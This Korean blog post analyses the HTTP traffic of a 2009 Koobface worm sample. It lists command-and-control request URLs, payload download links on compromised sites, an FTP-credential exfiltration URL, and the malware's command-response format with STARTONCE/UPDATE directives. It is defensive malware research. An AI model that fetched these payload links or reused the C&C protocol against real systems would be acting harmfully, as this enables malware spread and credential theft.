'/.sys/?getexe'에 해당되는 글 1건

  1. 2009.11.20 Koobface - setup.exe (HTTP 트래픽 중심의 분석)
0x02 analysis2009. 11. 20. 14:57


샘플은 offensivecomputing에서 확보했습니다.

File Name : setup.exe
File Size : 40,960 byte
md5sum : d274d51cd78c9e0ee79ab61880dc22b5


이전 글(http://malwarelab.tistory.com/?page=3)에 첨부된 트렌드마이크로 분석보고서와는 약간 다른 양상을 보이고 있는 것으로 보입니다. 전체적인 큰 틀은 거의 동일하지만 파일들도 많이 바뀐 것 같고 내부 로직도 일부 변경된 것으로 보입니다.

게다가 얼마전 ASEC의 블로그에 게재된 글에서 확인된 setup.exe와 사이즈가 차이가 있는 것으로 보아 지속적으로 변종이 나올 위험성이 있는 것으로 보입니다.


먼저 setup.exe 파일을 실행시켜 봤습니다.
보통 악성코드가 실행되어 접속하는 사이트들은 악성사이트로 간주하는 경우가 대부분이고 반복적으로 실행하더라도 접속하는 도메인이나 IP가 동일한 경우가 대부분입니다. (여기서 반복 실행은 모두 깨끗한 상태에서 실행을 의미합니다)

하지만 제가 획득한 setup.exe는 달랐습니다.
매번 실행할때마다 접속하는 사이트가 달랐습니다. -_-;;

그래도 어쨋든 일정 패턴을 가지고 있었습니다.

setup.exe 실행 직후에는 모두 google.com으로 접속합니다. 이는 현재 악성코드가 실행된 좀비가 인터넷이 가능한 환경인지 확인하기 위함입니다.




그리고 나서 악성코드를 다운로드하기 위한 사이트로 접속합니다.




dozerdoggie.com나 rowanhenderson.com 사이트는 정상사이트입니다.
dozerdoggie.com에 요청한 결과에는 404 Not Found가 나오자 rowanhenderson.com에 다시 동일한 내용을 요청합니다.

/.sys/?action=ldgen&v=15




위 URL을 요청하자 특정 포맷으로 이루어진 결과를 보내주고 있습니다.

/.sys/?getexe=v2prx.exe
/.sys/?getexe=pp.12.exe
/.sys/?getexe=get.exe
/.sys/?getexe=fb.73.exe
/.sys/?getexe=v2captcha.exe
/.sys/?getexe=v2googlecheck.exe


위에서 잠깐 말씀드렸지만 setup.exe를 실행할때마다 이런 도메인들이 계속 바뀝니다.
그것도 완전 랜덤으로 바뀌는데다가 대부분 정상사이트들입니다.

이번엔 비슷한 URL을 한번 더 요청합니다.




/.sys/?action=ldgen&a=-1201776206&v=15&l=1000&c_fb=1&c_ms=1&c_hi=0&c_tw=0&c_be=1&c_tg=0&c_nl=1

위 내용을 요청하면 아래와 같은 응답이 옵니다.




이번에는 약간 다른 요청을 하는데 URL에 포함된 파라미터에 따라 다운받을 파일들이 변합니다.

/.sys/?action=ldgen& --> 목록 생성(정도의 의미로 보면 될것 같습니다)
a=-1201776206& --> ???? (무슨 의미일지 가장 궁금한데 알 수가 없습니다) 좀비IP와 연관이 있을 것으로 추정됩니다.
v=15& --> 버전
l=1000& --> PID
c_fb=1& --> Facebook 사용중인지 확인하는 파라미터
c_ms=1& --> MySpace 사용중인지 확인하는 파라미터
c_hi=0& --> hi5 사용중인지 확인하는 파라미터
c_tw=0& --> Twitter 사용중인지 확인하는 파라미터
c_be=1& --> bebo 사용중인지 확인하는 파라미터
c_tg=0& --> tagged 사용중인지 확인하는 파라미터
c_nl=1 --> netlog 사용중인지 확인하는 파라미터



파라미터값이 1이면 사용중이라는 것이고 0이면 사용중이지 않다라는 의미입니다.
사용중인 것을 확인하는 것은 쿠키가 있는가 없는가를 가지고 판단하고 있었습니다. c_ 의 의미가 쿠키의 약자인듯 합니다.

결국 사용중인 Social Networking 사이트의 정보를 빼내갈 수 있는 악성코드만 다운로드하기 위함으로 보입니다.
Twitter를 사용하지도 않는데 Twitter 정보를 빼가는 악성코드를 다운로드해서 설치해봐야 의미가 없다는 생각이겠죠.

실제로 /.sys/?action=ldgen&a=-1201776206&v=15&l=1000&c_fb=1&c_ms=1&c_hi=1&c_tw=1&c_be=1&c_tg=1&c_nl=1 와 같은 형태로 요청을 해보면 모두 다운로드할 수 있는 링크를 보여줍니다.



트렌드마이크로 분석보고서에 보면 fubar.com이나 myyearbook.com, friendster.com과 같은 사이트에 대한 악성코드가 존재한다고 해서 c_fu=1&c_yb=1&c_fr=1을 붙여서 요청해봤지만 이 세개의 사이트에 대한 악성코드는 다운로드 되지 않았습니다.

즉, 쿠키가 존재 여부를 확인하여 파라미터값을 1로 설정하여 쿠키가 존재하는 사이트의 정보를 유출할 수 있는 악성코드만 다운로드하게끔 하고 있습니다.




목록에 지정된 파일들을 다운로드해서 실행합니다.

get.exe 파일을 다운로드해서 실행하면 xtsd20090815.com 도메인으로 연결을 하면서 특정 정보를 전송해줍니다.
이 도메인은 Koobface C&C 도메인으로 get.exe 파일이 실행되면 아래에 나열된 FTP 프로그램들의 설치 여부를 확인한 후 저장된 정보가 있으면 그 정보를 C&C 서버에게 전송합니다.

<Koobface C&C 관련 참고사이트>
http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html
http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

hxxp://xtsd20090815.com/adm/index.php?logs=<FTP사이트정보>






디버거로 확인한 결과 여러가지 FTP 프로그램의 레지스트리값을 뒤져서 있는 경우 해당 프로그램에서 사용하는 접속 정보를 저장하는 파일을 읽어서 logs= 뒤에 붙여서 C&C 서버로 전송하고 있었습니다. 위 그림에서는 짤렸는데 Internet Explorer를 통해 FTP 접속시 저장된 계정 정보도 유출하고 있었습니다.


Social Networking 사이트를 공격하는 악성코드들이 실행되면 다음과 같은 Request들이 발생합니다.

/.sys/?action=msgen&v=24
/.sys/?action=msgen&a=-1201776206&v=24







Reponse에 있는 내용은 최초 악성코드를 유포하는 코덱을 다운로드하게끔 하는 사이트로 연결하는 링크를 포함한 쪽지 내용들입니다. 이런식으로 계속 Social Networking 사이트 사용자들에게 쪽지를 보내 setup.exe 파일의 설치를 유도하고 있었습니다.



다운로드 되는 파일은 제가 처음에 분석하고 있던 파일들과 약간 사이즈가 다른 것으로 보아 변종으로 생각됩니다.

하지만 현재 다운로드되는 파일들이 여러 사이트를 통해 다운로드되지만 사이즈 확인 결과 모두 비슷한 파일인 것을 확인했습니다.
md5sum값은 모두 다르지만 ssdeep으로 확인해본 결과 모두 약간의 차이만 있는 변종 파일들이었습니다.

PS E:\04.analysis\binary\koobface\other_malware> ssdeep set*
ssdeep,1.0--blocksize:hash:hash,filename
384:5AZdwQjdy0AMi/jKqhnlso/M8gYLzZi+yjlG0pOgRGGP/orZaEocNd69xt+MlZfm:2ZdwQoJpRr/MTYPZibArZanFxckZO,"E:\04.analysis\binary\koobface\other_malware\setup.exe"
384:jAZdwQjdy0AMi/jKqhnlso/M8gYLzZi+yjlG0pOgRGGP/orZaEocNd69xt+MlZfm:EZdwQoJpRr/MTYPZibArZanFxckZO,"E:\04.analysis\binary\koobface\other_malware\setup1.exe"
384:DAZdwQjdy0AMi/jKqhnlso/M8gYLzZi+yjlG0pOgRGGP/orZaEocNd69xt+MlZfm:kZdwQoJpRr/MTYPZibArZanFxckZO,"E:\04.analysis\binary\koobface\other_malware\setup2.exe"

그리고 눈치채신 분들도 계시겠지만 악성코드들의 버전이 업그레이드되었습니다.
조금 전에 보셨던 요청 URL인 /.sys/?action=msgen&v=24에서 v=는 버전을 의미합니다.
처음에 보여드렸던 다운로드 파일은 ms.23.exe였는데 현재는 24입니다. 대부분의 악성코드들이 업그레이드 된 것으로 보입니다.

/.sys/?action=msgen&v=23을 요청하면 다음과 같은 응답이 옵니다.

#BLACKLABEL
RESET
UPDATE|http://inartdesigns.com/.sys/?getexe=ms.24.exe
EXIT
MD5|9f0c7d4916360cd4bc489270f5d62087


현재버전이 24이니 그걸로 업데이트해라....이런 말이죠...

처음 분석을 시작했을때(10일전)와 버전이 변경된건 2개였고 1개가 추가되었습니다.

#BLACKLABEL
#GEO=KR
#IP=221.139.14.3
#PID=1000
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=get.exe
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=fb.75.exe
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=be.18.exe
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=ms.24.exe
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=hi.15.exe
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=tg.14.exe
STARTONCE|http://nsync.filipinaprincess.com/.sys/?getexe=tw.07.exe
START|http://nsync.filipinaprincess.com/.sys/?getexe=v2newblogger.exe
START|http://nsync.filipinaprincess.com/.sys/?getexe=v2captcha.exe
START|http://nsync.filipinaprincess.com/.sys/?getexe=v2googlecheck.exe
MD5|f6110f3897ea1241482631a2c71cf0a9



모든 감염이 이루어진 후에는 다음과 같은 Captcha 화면을 보여줍니다.



화면에 보이는 글자는 정상적으로 입력하지 않아도 화면이 풀리게 되어 있습니다. 물론 틀리면 틀렸다는 메시지를 보여주지만 다섯번 정도 틀린 후에는 정상적으로 화면이 풀립니다.
머...틀린 글자를 입력해도 풀리긴 하지만 이렇게 푼 경우에는 조금 후에 다시 captcha 화면이 보여집니다.

captcha 이미지와 관련된 요청은 capthcabreak.com과 captchastop.com에게 하고 있었는데 두개의 도메인이 동일한 IP를 사용하고 있었습니다. 실행할때마다 capthcabreak.com하고만 통신하는 경우가 있었고 간혹 둘 다 통신하는 경우도 있었는데 IP가 동일하기 때문에 별 의미는 없는 것으로 보입니다.

/captcha/?a=get&i=0&v=14 --> captch 이미지 요청
/blogspot/newblogger.php?a=names&ver=12
/captcha/tmp/go9482090.jpg --> captcha 이미지
/check/in.php?v=7
/check/blocked.php?v=7&url=http%3A%2F%2Fbit.ly%2F1ZwUlt --> setup.exe를 다운받아 설치하게끔 유도하는 사이트
/check/out.php?v=7
/captcha/?a=save&b=goo
/captcha/?a=query&b=goo&id=9482119
/captcha/?a=put&id=go9482090&v=14&code=schanato --> captcha 이미지상의 문자열 입력
/captcha/?a=query&b=goo&id=9482119
/captcha/?a=save&b=goo
/captcha/?a=query&b=goo&id=9482187
/check/in.php?v=7
/check/dump.php?v=7&url=http%3A%2F%2Fsiriuspro.com%2F122%2F --> setup.exe를 다운받아 설치하게끔 유도하는 사이트
/check/out.php?v=7

?a=save와 ?a=query는 무슨짓을 하는지 파악이 잘 안되고 있습니다.
솔직히 captcha는 별게 없어 보이는데 분석할수록 뭔가 이상한게 계속 나오고 있습니다. -_-;;

/check/in.php?v=7은 위와 같은 악성페이지들의 목록과 크기(byte)을 랜덤하게 보여주고 여기서 확인된 악성페이지를 blocked.php나 dump.php를 이용해서 악성페이지 내용을 그대로 올리고 있는데 HTML 내용을 보면 Facebook 페이지 중 하나를 그대로 사용한 것이고 continue 버튼을 누르면 setup.exe 파일을 다운로드 하는 사이트로 연결됩니다.
blocked.php나 dump.php가 번갈아가면서 사용이 되는데 아직 정확히 어떤 조건에서 둘 중 하나를 쓰는지 확인은 못했습니다.




일단은 여기까지가 setup.exe를 실행시켜 동적분석한 내용입니다.

결국 /.sys/?action= 과 /.sys/?getexe= 이라는 URL을 통해서 뭔가 행동을 하고 있습니다.
부가적인 악성코드도 받아오고 악성페이지를 보여조는 쪽지를 보내기도 하구요..

그래서 IDS에 패턴을 넣어서 추이를 살펴본 결과 C&C로의 통신이나 위 두개의 URL을 요청하는 경우가 그리 많지는 않았습니다.
랜덤하게 사용되는 악성코드 유포 사이트들의 도메인이름도 .kr 도메인은 하나도 보질 못했고 Top Level Domain들이 대부분이었고 TLD가 아닌 경우에는 유럽이나 미국쪽 사이트들이었습니다.


뭔가 좀 부족한 느낌이 드는건 아직 파일을 동적 분석해보지 않았다는 것이 되겠습니다. -_-;;
조만간 짬짬히 시간을 내서 파일 분석을 해보면 어떤 파일이 어떤 행동을 하는지 좀 더 명확해질 것 같습니다.

바이너리는 조만간(?) 분석해서 따로 글을 게시하도록 하겠습니다.




Posted by demantos